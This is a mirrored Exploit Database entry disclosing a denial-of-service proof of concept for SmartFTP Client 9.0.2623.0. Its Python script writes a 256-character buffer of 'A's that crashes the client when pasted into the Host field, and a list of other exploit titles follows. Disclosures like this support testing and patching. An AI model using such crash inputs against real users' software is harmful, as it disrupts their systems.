SmartFTP Client 9.0.2623.0 – Denial of Service (PoC)

Exploit Database
92 阅读

作者： Alejandra Sánchez

日期： 2018-12-11
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/45966/

# -*- coding: utf-8 -*-
# Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service (PoC)
# Date: 06/12/2018
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/get/SFTPMSI64.exe
# Version: 9.0.2623.0
# Tested on: Windows Server 2016 (x64)/ Windows 10 Single Language x64

# Steps to Produce the Crash: 
# 1.- Run python code : python SmartFTPClient.py
# 2.- Open SmartFTPClient.txt and copy content to clipboard
# 3.- Open SmartFTP Client 
# 4.- New connection
# 5.- Paste ClipBoard on Host 
# 6.- Crashed


buffer = "\x41" * 256
f = open ("SmartFTPClient.txt", "w")
f.write(buffer)
f.close()

last Exploits
SmartFTP Client 9.0.2623.0 – Denial of Service (PoC)的更多信息

Microsoft Windows Kernel – ‘NtQueryInformationThread(ThreadBasicInformation)’ 64-bit Stack Memory Disclosure：
Microsoft IIS 7.5 (Windows 7) – FTPSVC Unauthorized Remote Denial of Service (PoC)：
Mozilla Firefox – Remote Denial of Service：
OpenSSH 7.2 – Denial of Service：
Restorator 1793 – Denial of Service (PoC)：
AbsoluteTelnet 11.21 – ‘Username’ Denial of Service (PoC)：
Edraw Diagram Component 5 – ActiveX Buffer Overflow (Denial of Service) (PoC)：
Android – ‘getpidcon’ Permission Bypass in KeyStore Service：